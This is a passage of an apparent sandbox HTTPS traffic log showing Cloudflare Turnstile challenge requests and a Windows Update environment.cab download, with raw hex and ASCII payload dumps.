en-US,en;q=0.9
2024-10-30 15:05:43 UTC	16384	OUT	Data Raw: 76 5f 38 64 61 63 34 64 65 64 65 64 62 37 34 36 35 34 3d 67 4e 54 46 43 6f 6e 32 5a 52 5a 6a 5a 6e 7a 6e 47 24 78 24 66 71 70 32 36 30 6e 35 24 6d 46 79 4e 36 6b 24 4a 46 6a 6a 70 6e 79 24 53 46 54 45 70 6f 53 24 75 46 6f 54 6f 6b 33 24 41 71 50 24 36 2d 46 24 67 46 70 7a 24 56 46 46 6f 69 24 6e 4d 77 6e 48 24 6a 4a 6e 38 61 64 24 36 44 42 24 30 44 70 54 4d 70 6f 35 5a 6e 36 24 24 5a 5a 56 24 74 43 6e 69 6e 44 46 6a 58 68 73 24 56 64 46 6e 49 24 31 2d 36 6f 30 4e 5a 50 64 46 75 4d 24 30 63 33 4c 37 70 24 32 77 24 57 24 24 53 37 24 70 76 55 7a 57 4d 44 37 55 64 24 70 50 43 4a 34 52 69 24 6f 57 4d 4a 63 52 43 77 51 7a 37 53 6a 49 74 6e 2d 2d 24 67 71 2d 24 4b 24 6d 36 72 6f 5a 6e 72 75 49 75 71 4c 7a 6a 6e 4a 76 66 50 46 70 63 47 42 41 4d 4c 72 76 6c 6b 5a Data Ascii: v_8dac4dededb74654=gNTFCon2ZRZjZnznG$x$fqp260n5$mFyN6k$JFjjpny$SFTEpoS$uFoTok3$AqP$6-F$gFpz$VFFoi$nMwnH$jJn8ad$6DB$0DpTMpo5Zn6$$ZZV$tCninDFjXhs$VdFnI$1-6o0NZPdFuM$0c3L7p$2w$W$$S7$pvUzWMD7Ud$pPCJ4Ri$oWMJcRCwQz7SjItn--$gq-$K$m6roZnruIuqLzjnJvfPFpcGBAMLrvlkZ
2024-10-30 15:05:43 UTC	15435	OUT	Data Raw: 72 33 38 41 30 7a 70 6a 6a 77 30 55 6f 53 33 7a 77 30 54 24 24 66 4e 6f 24 7a 24 42 24 6a 2d 6e 63 24 6d 4e 6a 24 24 32 24 63 4e 24 59 6f 61 54 50 64 48 54 24 4f 34 61 4f 46 45 6f 34 24 51 38 54 46 6f 5a 24 6e 4a 71 24 50 4f 46 42 24 54 54 24 4d 24 4d 4e 54 2d 6f 4b 46 48 2d 36 4a 24 4d 24 43 63 6e 77 36 6f 24 48 24 54 76 6e 64 24 4d 46 48 4e 24 46 24 6f 46 6f 4a 47 47 24 6b 46 74 46 6f 56 77 74 46 36 5a 24 79 24 78 46 30 5a 6e 6b 24 43 46 6f 4e 24 6f 24 56 24 54 69 24 76 77 79 46 6f 24 24 51 52 46 46 74 70 6f 4e 24 4d 53 49 24 24 69 24 6c 52 6e 37 46 77 24 34 24 6a 24 50 48 2d 2b 77 36 2d 6e 54 24 78 24 24 49 24 69 24 39 24 6e 5a 36 4d 24 72 24 6f 32 24 5a 24 57 5a 30 67 69 4f 46 69 77 52 54 36 65 24 48 2d 24 4a 6f 4d 24 52 7a 74 45 24 74 46 4d 2d 6f 65 Data Ascii: r38A0zpjjw0UoS3zw0T$$fNo$z$B$j-nc$mNj$$2$cN$YoaTPdHT$O4aOFEo4$Q8TFoZ$nJq$POFB$TT$M$MNT-oKFH-6J$M$Ccnw6o$H$Tvnd$MFHN$F$oFoJGG$kFtFoVwtF6Z$y$xF0Znk$CFoN$o$V$Ti$vwyFo$$QRFFtpoN$MSI$$i$lRn7Fw$4$j$PH-+w6-nT$x$$I$i$9$nZ6M$r$o2$Z$WZ0giOFiwRT6e$H-$JoM$RztE$tFM-oe
2024-10-30 15:05:44 UTC	330	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:44 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 26352 Connection: close cf-chl-gen: Sy9y/Ssnfc2BfP1NN8bpBl1o7CUMxb5VZNns2zhQOEMTV5Z6+ujurCYdf90KzXs62D9Ela1VTX5hOO1N$zRwyEqFYoDeBJuet Server: cloudflare CF-RAY: 8dac4e2258d22832-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:44 UTC	1039	IN	Data Raw: 63 49 74 61 54 32 6d 50 64 45 32 56 6b 6e 52 62 6d 33 74 63 56 59 79 42 62 70 35 57 6b 6f 61 69 57 6f 46 31 61 6e 2b 61 5a 58 39 35 67 32 31 39 6f 4a 53 57 72 6f 47 42 73 33 46 79 75 70 79 37 69 4b 43 32 69 34 53 63 67 49 4f 51 66 38 66 4d 67 72 75 6f 79 34 61 67 78 59 71 47 30 70 43 4f 6f 35 61 59 6d 63 69 38 73 74 4b 6f 6c 37 61 73 76 63 32 6b 6f 74 54 49 76 75 43 73 78 63 62 5a 79 73 4f 77 72 65 44 55 31 74 6a 49 30 74 72 76 79 39 6e 71 2b 37 4c 67 39 73 33 4f 38 74 72 54 32 65 44 41 79 63 76 44 78 64 72 5a 34 39 44 4b 41 66 54 75 42 4d 34 48 39 52 30 52 35 2f 6a 2b 46 66 58 55 38 42 49 6a 2f 65 58 79 47 42 34 69 41 41 38 6d 48 50 76 72 4a 2f 33 30 49 7a 6a 33 36 6a 63 6f 2b 67 34 47 43 76 55 4c 4b 67 46 46 39 6b 51 35 47 54 45 55 42 45 4e 48 50 79 45 Data Ascii: cItaT2mPdE2VknRbm3tcVYyBbp5WkoaiWoF1an+aZX95g219oJSWroGBs3Fyupy7iKC2i4ScgIOQf8fMgruoy4agxYqG0pCOo5aYmci8stKol7asvc2kotTIvuCsxcbZysOwreDU1tjI0trvy9nq+7Lg9s3O8trT2eDAycvDxdrZ49DKAfTuBM4H9R0R5/j+FfXU8BIj/eXyGB4iAA8mHPvrJ/30Izj36jco+g4GCvULKgFF9kQ5GTEUBENHPyE
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 77 64 5a 35 73 58 46 6d 68 67 47 56 6d 70 71 43 56 64 36 46 6e 71 49 79 44 70 6f 69 30 6a 58 4f 33 67 58 47 78 70 4b 4f 47 74 61 69 6e 73 4c 6d 73 6f 38 53 39 73 4b 69 69 77 62 53 73 76 4a 32 6b 78 71 4c 4a 76 4c 4f 31 6b 37 2b 2f 7a 39 6d 6f 7a 39 58 63 71 72 36 34 34 62 6e 63 76 4f 57 2b 33 37 66 4a 34 61 75 6e 71 4d 62 62 7a 39 48 63 77 37 33 75 72 36 33 55 30 75 58 46 74 2b 72 38 33 4e 6d 2f 42 4d 32 39 2f 66 44 6f 34 67 4c 30 37 50 7a 64 35 41 66 69 43 76 7a 7a 39 64 4d 41 41 42 41 61 36 41 51 64 48 76 6f 52 2b 43 4c 35 48 66 77 6d 2f 69 45 42 4b 67 58 71 48 67 44 2b 44 76 6f 4d 45 69 63 55 4a 78 51 72 46 2f 48 31 44 51 34 71 4c 53 77 4e 4c 69 49 74 4d 6a 59 68 50 30 59 41 42 6a 34 31 4c 68 38 38 4a 6a 42 42 4d 6c 4a 47 4d 53 70 47 52 6b 5a 63 57 30 Data Ascii: wdZ5sXFmhgGVmpqCVd6FnqIyDpoi0jXO3gXGxpKOGtainsLmso8S9sKiiwbSsvJ2kxqLJvLO1k7+/z9moz9Xcqr644bncvOW+37fJ4aunqMbbz9Hcw73ur63U0uXFt+r83Nm/BM29/fDo4gL07Pzd5AfiCvzz9dMAABAa6AQdHvoR+CL5Hfwm/iEBKgXqHgD+DvoMEicUJxQrF/H1DQ4qLSwNLiItMjYhP0YABj41Lh88JjBBMlJGMSpGRkZcW0
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 6e 6c 78 78 63 49 46 6c 61 71 71 6a 67 47 57 49 71 5a 4b 4d 63 4b 43 78 61 59 69 70 72 6e 46 79 72 5a 65 32 72 35 4a 39 65 36 57 42 72 72 6a 46 6e 6f 61 32 75 59 4f 41 6a 36 65 6c 71 71 4c 42 74 73 47 69 70 38 4b 31 75 4e 61 35 79 70 36 57 32 37 50 57 75 4a 37 5a 76 74 61 33 78 62 57 37 71 39 2f 62 76 39 72 6a 35 62 44 64 78 38 72 31 7a 72 62 6e 36 66 66 50 76 39 6a 30 2b 4e 62 73 2b 50 4c 47 77 76 7a 47 30 77 73 48 7a 64 6e 75 41 41 34 4b 7a 4e 4d 59 42 50 63 44 32 64 48 53 32 79 44 75 48 74 6a 7a 44 4f 37 65 47 51 63 6d 2f 75 59 61 42 43 50 75 35 66 67 4a 38 4f 6b 6b 38 2f 59 43 46 79 67 32 4d 7a 44 37 51 43 77 67 47 55 51 4f 4d 7a 38 48 45 6a 63 39 51 52 38 31 4f 6b 38 6b 53 42 49 7a 44 44 59 4f 55 67 6f 71 49 6c 49 63 47 52 67 79 4b 69 6c 57 4f 42 39 Data Ascii: nlxxcIFlaqqjgGWIqZKMcKCxaYiprnFyrZe2r5J9e6WBrrjFnoa2uYOAj6elqqLBtsGip8K1uNa5yp6W27PWuJ7Zvta3xbW7q9/bv9rj5bDdx8r1zrbn6ffPv9j0+Nbs+PLGwvzG0wsHzdnuAA4KzNMYBPcD2dHS2yDuHtjzDO7eGQcm/uYaBCPu5fgJ8Okk8/YCFyg2MzD7QCwgGUQOMz8HEjc9QR81Ok8kSBIzDDYOUgoqIlIcGRgyKilWOB9
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 71 53 48 70 71 52 2b 66 35 35 73 62 61 32 67 70 71 69 69 65 61 71 4e 64 4a 4b 77 66 58 69 57 74 5a 5a 38 6d 72 6e 41 67 4a 36 37 69 59 53 69 77 4c 69 49 70 73 54 52 70 62 4c 48 70 70 53 75 6a 64 72 56 32 71 72 4e 32 37 50 63 30 71 47 69 30 75 58 71 36 36 48 70 79 62 71 33 77 71 7a 4b 33 39 4f 30 77 72 62 32 38 72 69 78 73 72 75 34 79 4e 66 57 31 75 48 53 30 41 54 43 77 39 6b 4c 41 41 76 61 36 52 45 43 43 51 6e 2b 44 64 33 6a 34 51 6f 57 37 4e 55 47 2b 39 6e 7a 32 77 48 32 39 39 2f 6a 47 42 54 34 38 53 6f 65 4c 42 33 6e 4a 76 67 47 38 76 33 76 49 7a 55 56 49 6a 6b 62 48 42 4d 30 51 42 73 2b 46 68 59 73 50 45 55 38 47 6b 42 4a 51 52 35 45 54 55 63 69 53 46 46 45 4a 6b 78 56 53 69 70 51 57 55 38 73 53 78 74 52 57 46 68 68 55 6c 6c 67 59 56 39 64 4f 56 4e 6e Data Ascii: qSHpqR+f55sba2gpqiieaqNdJKwfXiWtZZ8mrnAgJ67iYSiwLiIpsTRpbLHppSujdrV2qrN27Pc0qGi0uXq66Hpybq3wqzK39O0wrb28rixsru4yNfW1uHS0ATCw9kLAAva6RECCQn+Dd3j4QoW7NUG+9nz2wH299/jGBT48SoeLB3nJvgG8v3vIzUVIjkbHBM0QBs+FhYsPEU8GkBJQR5ETUciSFFEJkxVSipQWU8sSxtRWFhhUllgYV9dOVNn
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 70 7a 73 6e 53 57 6f 71 2b 33 6c 4b 79 71 73 48 71 71 76 73 4b 4c 6f 4c 32 68 65 49 47 32 76 49 61 35 70 4c 37 50 6d 63 32 36 6b 70 33 52 30 70 43 4e 31 63 37 62 71 61 75 39 31 61 76 57 6e 4b 37 50 77 39 71 59 6e 63 44 47 31 62 54 4d 32 75 44 4d 7a 62 37 73 38 2f 57 7a 34 73 48 58 37 4c 54 47 30 4d 72 63 2b 74 75 2b 32 2b 7a 59 41 4d 4c 42 39 73 48 47 39 67 73 50 31 2b 76 4f 37 63 2f 4e 42 4f 4c 53 79 65 63 45 36 75 66 53 2b 66 62 6e 49 42 54 71 39 69 51 47 47 50 6b 5a 49 41 58 68 48 51 48 6e 35 66 6b 6f 4b 51 63 7a 4b 41 62 74 4a 77 49 73 44 51 55 47 46 78 41 4c 45 67 73 45 2b 68 6f 38 43 50 35 48 41 52 52 4c 46 69 34 43 42 77 30 76 45 77 74 4c 44 79 63 78 4f 6b 73 73 45 7a 6b 52 4d 45 39 50 48 54 4d 62 50 53 51 77 56 69 6b 33 50 46 74 58 49 55 42 49 5a Data Ascii: pzsnSWoq+3lKyqsHqqvsKLoL2heIG2vIa5pL7Pmc26kp3R0pCN1c7bqau91avWnK7Pw9qYncDG1bTM2uDMzb7s8/Wz4sHX7LTG0Mrc+tu+2+zYAMLB9sHG9gsP1+vO7c/NBOLSyecE6ufS+fbnIBTq9iQGGPkZIAXhHQHn5fkoKQczKAbtJwIsDQUGFxALEgsE+ho8CP5HARRLFi4CBw0vEwtLDycxOkssEzkRME9PHTMbPSQwVik3PFtXIUBIZ
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 77 69 4a 4f 59 74 37 57 49 69 4c 70 34 65 63 47 68 65 49 65 32 77 6f 70 39 79 37 2b 57 6a 38 37 48 73 34 6e 42 73 4e 65 76 6f 61 47 51 74 38 36 6d 72 62 6e 53 76 72 61 76 72 38 57 66 77 64 72 59 74 73 65 34 71 4d 62 4b 79 4e 4b 37 7a 66 54 6e 77 73 48 31 72 36 79 37 31 37 75 33 79 66 32 37 77 4e 48 63 30 4d 44 52 39 2f 37 4b 79 2b 50 69 31 75 6a 48 30 65 54 71 42 2f 4c 68 34 75 48 69 38 50 59 50 2f 64 44 34 31 78 6a 59 41 42 66 74 39 41 41 46 4a 43 4c 30 39 43 66 6b 35 53 34 4f 35 50 4d 6a 4c 2f 62 70 4f 43 77 44 2b 7a 73 30 49 50 55 75 48 55 51 63 44 67 38 64 49 7a 73 31 48 53 4d 2f 50 52 34 62 48 55 6b 6c 4c 53 41 56 46 69 46 4c 4a 79 34 75 4e 54 59 78 46 68 63 67 47 7a 74 69 52 6a 6b 65 56 6d 52 4d 4e 45 52 59 51 54 35 65 4c 43 6f 7a 4c 44 39 46 55 6c Data Ascii: wiJOYt7WIiLp4ecGheIe2wop9y7+Wj87Hs4nBsNevoaGQt86mrbnSvravr8WfwdrYtse4qMbKyNK7zfTnwsH1r6y717u3yf27wNHc0MDR9/7Ky+Pi1ujH0eTqB/Lh4uHi8PYP/dD41xjYABft9AAFJCL09Cfk5S4O5PMjL/bpOCwD+zs0IPUuHUQcDg8dIzs1HSM/PR4bHUklLSAVFiFLJy4uNTYxFhcgGztiRjkeVmRMNERYQT5eLCozLD9FUl
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 73 71 79 61 6e 62 61 38 6e 61 44 4a 79 4a 6d 6b 76 6f 32 5a 71 49 69 61 6f 36 79 77 78 4b 61 75 70 4d 53 78 74 36 69 2b 72 4c 6a 53 7a 4c 4b 37 6d 38 2b 6c 77 64 72 55 74 38 54 49 33 4d 44 49 34 75 53 39 7a 62 2f 30 79 4e 44 45 7a 73 6a 57 73 39 4c 4d 32 63 7a 30 7a 39 72 51 2f 4e 50 68 35 50 6a 57 35 39 6a 69 35 65 6b 44 2b 39 48 74 43 4e 37 6f 38 65 51 4e 36 76 55 50 39 75 33 34 49 69 48 7a 2f 52 66 36 2f 51 45 46 48 66 6f 49 2b 42 33 2b 42 2f 77 6c 42 41 30 42 43 77 51 52 4b 78 4d 49 46 52 6b 6f 2f 52 6f 64 46 78 49 64 4e 7a 55 56 49 41 45 54 47 69 55 6f 54 53 41 70 51 30 45 6a 4c 6a 45 72 4b 54 51 6c 53 53 63 7a 4b 54 63 76 4f 78 67 37 4c 6a 31 42 55 54 35 43 4e 53 6b 71 52 6c 39 4c 4f 6b 6b 39 61 55 52 4f 55 55 39 44 54 30 56 54 54 46 5a 4a 64 56 46 Data Ascii: sqyanba8naDJyJmkvo2ZqIiao6ywxKaupMSxt6i+rLjSzLK7m8+lwdrUt8TI3MDI4uS9zb/0yNDEzsjWs9LM2cz0z9rQ/NPh5PjW59ji5ekD+9HtCN7o8eQN6vUP9u34IiHz/Rf6/QEFHfoI+B3+B/wlBA0BCwQRKxMIFRko/RodFxIdNzUVIAETGiUoTSApQ0EjLjErKTQlSSczKTcvOxg7Lj1BUT5CNSkqRl9LOkk9aUROUU9DT0VTTFZJdVF
2024-10-30 15:05:44 UTC	1369	IN	Data Raw: 70 4b 34 6c 59 4f 5a 7a 59 79 4e 6e 63 47 64 73 4b 58 56 6c 4a 57 6b 6f 36 57 34 72 64 32 63 6e 61 37 53 32 37 2b 36 72 61 47 35 73 63 53 78 31 73 4b 34 34 36 54 43 33 75 53 36 77 75 58 30 78 64 48 54 75 50 62 46 32 4d 58 71 31 73 7a 34 31 4e 6f 47 42 50 7a 68 42 77 48 53 32 76 30 4d 2b 2b 51 41 37 51 2f 6a 33 2f 58 7a 36 67 6a 59 30 2b 76 6e 33 4e 33 75 45 78 77 4d 2b 75 30 68 2b 66 62 7a 4b 42 55 47 4c 66 6e 74 41 41 30 73 42 51 7a 2b 42 76 55 48 46 50 6a 35 44 43 38 34 4c 42 63 4b 41 68 59 55 45 45 51 31 49 6b 67 6d 43 68 6b 70 53 43 45 6f 47 67 6b 53 4a 69 41 56 4b 69 59 30 4a 79 73 75 46 46 67 78 4f 43 6f 2b 49 6a 4a 41 4d 7a 63 36 61 69 6b 71 4f 6b 67 37 50 6b 49 6f 62 45 56 4d 50 7a 34 32 52 6c 52 48 53 6b 35 2b 50 54 35 4f 58 45 39 56 56 6a 79 41 Data Ascii: pK4lYOZzYyNncGdsKXVlJWko6W4rd2cna7S27+6raG5scSx1sK446TC3uS6wuX0xdHTuPbF2MXq1sz41NoGBPzhBwHS2v0M++QA7Q/j3/Xz6gjY0+vn3N3uExwM+u0h+fbzKBUGLfntAA0sBQz+BvUHFPj5DC84LBcKAhYUEEQ1IkgmChkpSCEoGgkSJiAVKiY0JysuFFgxOCo+IjJAMzc6aikqOkg7PkIobEVMPz42RlRHSk5+PT5OXE9VVjyA

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:44 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=MGG2mpSAltYVC4R&MD=3aPuGXPU HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-10-30 15:05:44 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 0f5a12d3-fcf8-4c7a-82ba-b56b80eedb18 MS-RequestId: 9e7b822e-9008-408a-bc42-9d10eb17933c MS-CV: Jm4zymS9mUqXn6XG.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Wed, 30 Oct 2024 15:05:43 GMT Connection: close Content-Length: 24490
2024-10-30 15:05:44 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-10-30 15:05:44 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:45 UTC	597	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:45 UTC	379	IN	HTTP/1.1 404 Not Found Date: Wed, 30 Oct 2024 15:05:45 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: +U5RWFGqvi5m0vE4SL7SPDuOTnFdwdDG0vw=$qy1iRx8P3uSXoX7u Server: cloudflare CF-RAY: 8dac4e29ed023ad2-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:45 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:52 UTC	1149	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 34231 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:52 UTC	16384	OUT	Data Raw: 76 5f 38 64 61 63 34 64 65 64 65 64 62 37 34 36 35 34 3d 67 4e 54 46 43 6f 6e 32 5a 52 5a 6a 5a 6e 7a 6e 47 24 78 24 66 71 70 32 36 30 6e 35 24 6d 46 79 4e 36 6b 24 4a 46 6a 6a 70 6e 79 24 53 46 54 45 70 6f 53 24 75 46 6f 54 6f 6b 33 24 41 71 50 24 36 2d 46 24 67 46 70 7a 24 56 46 46 6f 69 24 6e 4d 77 6e 48 24 6a 4a 6e 38 61 64 24 36 44 42 24 30 44 70 54 4d 70 6f 35 5a 6e 36 24 24 5a 5a 56 24 74 43 6e 69 6e 44 46 6a 58 68 73 24 56 64 46 6e 49 24 31 2d 36 6f 30 4e 5a 50 64 46 75 4d 24 30 63 33 4c 37 70 24 32 77 24 57 24 24 53 37 24 70 76 55 7a 57 4d 44 37 55 64 24 70 50 43 4a 34 52 69 24 6f 57 4d 4a 63 52 43 77 51 7a 37 53 6a 49 74 6e 2d 2d 24 67 71 2d 24 4b 24 6d 36 72 6f 5a 6e 72 75 49 75 71 4c 7a 6a 6e 4a 76 66 50 46 70 63 47 42 41 4d 4c 72 76 6c 6b 5a Data Ascii: v_8dac4dededb74654=gNTFCon2ZRZjZnznG$x$fqp260n5$mFyN6k$JFjjpny$SFTEpoS$uFoTok3$AqP$6-F$gFpz$VFFoi$nMwnH$jJn8ad$6DB$0DpTMpo5Zn6$$ZZV$tCninDFjXhs$VdFnI$1-6o0NZPdFuM$0c3L7p$2w$W$$S7$pvUzWMD7Ud$pPCJ4Ri$oWMJcRCwQz7SjItn--$gq-$K$m6roZnruIuqLzjnJvfPFpcGBAMLrvlkZ
2024-10-30 15:05:52 UTC	16384	OUT	Data Raw: 72 33 38 41 30 7a 70 6a 6a 77 30 55 6f 53 33 7a 77 30 54 24 24 66 4e 6f 24 7a 24 42 24 6a 2d 6e 63 24 6d 4e 6a 24 24 32 24 63 4e 24 59 6f 61 54 50 64 48 54 24 4f 34 61 4f 46 45 6f 34 24 51 38 54 46 6f 5a 24 6e 4a 71 24 50 4f 46 42 24 54 54 24 4d 24 4d 4e 54 2d 6f 4b 46 48 2d 36 4a 24 4d 24 43 63 6e 77 36 6f 24 48 24 54 76 6e 64 24 4d 46 48 4e 24 46 24 6f 46 6f 4a 47 47 24 6b 46 74 46 6f 56 77 74 46 36 5a 24 79 24 78 46 30 5a 6e 6b 24 43 46 6f 4e 24 6f 24 56 24 54 69 24 76 77 79 46 6f 24 24 51 52 46 46 74 70 6f 4e 24 4d 53 49 24 24 69 24 6c 52 6e 37 46 77 24 34 24 6a 24 50 48 2d 2b 77 36 2d 6e 54 24 78 24 24 49 24 69 24 39 24 6e 5a 36 4d 24 72 24 6f 32 24 5a 24 57 5a 30 67 69 4f 46 69 77 52 54 36 65 24 48 2d 24 4a 6f 4d 24 52 7a 74 45 24 74 46 4d 2d 6f 65 Data Ascii: r38A0zpjjw0UoS3zw0T$$fNo$z$B$j-nc$mNj$$2$cN$YoaTPdHT$O4aOFEo4$Q8TFoZ$nJq$POFB$TT$M$MNT-oKFH-6J$M$Ccnw6o$H$Tvnd$MFHN$F$oFoJGG$kFtFoVwtF6Z$y$xF0Znk$CFoN$o$V$Ti$vwyFo$$QRFFtpoN$MSI$$i$lRn7Fw$4$j$PH-+w6-nT$x$$I$i$9$nZ6M$r$o2$Z$WZ0giOFiwRT6e$H-$JoM$RztE$tFM-oe
2024-10-30 15:05:52 UTC	1463	OUT	Data Raw: 4d 75 65 6e 69 24 52 73 36 51 51 67 63 59 42 59 58 33 69 69 54 43 7a 74 35 6d 69 59 44 70 37 4a 5a 74 75 4d 4d 77 33 61 24 6c 34 6f 75 66 38 77 70 4c 68 35 74 43 73 47 42 5a 30 24 41 4e 48 66 58 69 6e 52 4d 69 77 6c 4b 51 2d 59 4e 2b 6f 64 24 4e 71 6b 4a 38 37 71 31 45 69 46 24 79 24 55 71 32 77 36 34 35 61 52 57 53 71 46 65 4e 74 44 5a 6f 41 52 55 46 6a 30 6e 48 63 75 2d 55 37 43 52 24 37 64 4b 6b 32 38 24 41 77 70 78 61 37 24 4a 37 6b 46 24 75 33 7a 46 55 64 4b 73 74 45 64 75 70 6e 63 24 6a 2d 36 63 36 76 57 4e 2d 52 75 31 46 44 67 46 30 4a 6e 76 24 31 4e 77 4e 24 61 77 59 54 61 43 70 72 37 4a 54 2d 6a 70 6b 24 53 6d 4f 32 24 34 74 59 7a 70 4a 6f 52 55 53 79 6f 68 7a 54 24 77 36 32 6f 76 4d 50 69 34 5a 58 57 47 71 79 77 32 7a 24 79 24 32 2d 38 6f 78 2b Data Ascii: Mueni$Rs6QQgcYBYX3iiTCzt5miYDp7JZtuMMw3a$l4ouf8wpLh5tCsGBZ0$ANHfXinRMiwlKQ-YN+od$NqkJ87q1EiF$y$Uq2w645aRWSqFeNtDZoARUFj0nHcu-U7CR$7dKk28$Awpxa7$J7kF$u3zFUdKstEdupnc$j-6c6vWN-Ru1FDgF0Jnv$1NwN$awYTaCpr7JT-jpk$SmO2$4tYzpJoRUSyohzT$w62ovMPi4ZXWGqyw2z$y$2-8ox+
